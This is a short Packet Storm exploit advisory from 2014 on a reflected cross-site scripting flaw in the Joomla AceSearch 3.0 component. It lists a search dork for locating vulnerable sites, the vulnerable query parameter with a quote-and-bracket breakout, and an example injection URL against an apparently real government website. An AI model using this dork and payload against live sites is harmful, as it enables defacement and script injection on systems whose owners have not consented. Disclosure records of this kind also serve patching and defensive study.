Joomla AceSearch 3.0 Cross Site Scripting

2014-01-06T00:00:00
ID PACKETSTORM:124684
Type packetstorm
Reporter DevilScreaM
Modified 2014-01-06T00:00:00

Description

                                        
                                            `  
  
#Title : Joomla Component AceSearch Cross Site Scripting  
  
#Author : DevilScreaM  
  
#Date : 5 January 2014  
  
#Category : Web Applications  
  
#Product : http://www.joomace.net/joomla-extensions/acesearch/  
  
#Version : 3.0  
  
#Type : PHP  
  
#Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security  
Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber  
  
#Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |  
  
#Tested : Mozila, Chrome, Opera -> Windows & Linux  
  
#Vulnerabillity : Cross Site Scripting  
  
#Dork : inurl:component/acesearch/  
  
  
  
Cross Site Scripting  
  
http://site-target/component/acesearch/search?query=”>[XSS]  
Use “> for Bypass Cross Site Scripting  
  
Example :  
http://kpi.go.id/index.php/component/acesearch/search?query=”><h1>DevilScreaM</h1>  
`